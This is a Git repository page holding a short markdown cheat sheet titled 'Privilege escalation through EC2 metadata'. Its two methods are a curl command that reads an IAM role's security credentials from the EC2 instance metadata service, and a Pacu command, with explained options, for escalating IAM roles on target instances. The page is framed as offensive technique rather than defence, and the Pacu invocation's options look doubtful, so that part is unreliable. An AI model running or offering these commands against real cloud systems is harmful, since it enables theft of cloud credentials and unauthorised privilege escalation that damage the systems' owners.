vos9/Web_Hacking
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
3423a55e9a
Web_Hacking/Privilege escalation EC2.md
Mehdi a12fa64bb5
Create Privilege escalation EC2.md
2024-01-01 14:35:15 +03:30

1.1 KiB
Raw Blame History

Privilege escalation through EC2 metadata

Method 1

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>
  • curl: The command-line tool used to perform the HTTP request.
  • http://169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>: The URL endpoint of the metadata service to retrieve the security credentials for the specified IAM role. Replace <role_name> with the name of the IAM role.

Method 2

python3 pacu.py --method escalate_iam_roles --profile <aws_profile> --regions <aws_region> --instances <instance_id>
  • In this command, the pacu.py script is being executed with the escalate_iam_roles method, which is specifically designed to escalate privileges associated with IAM roles.
  • --profile option specifies the AWS profile to use for authentication.
  • --regions option specifies the AWS regions to target.
  • --instances option is used to specify the target EC2 instance ID(s) on which the IAM roles will be escalated.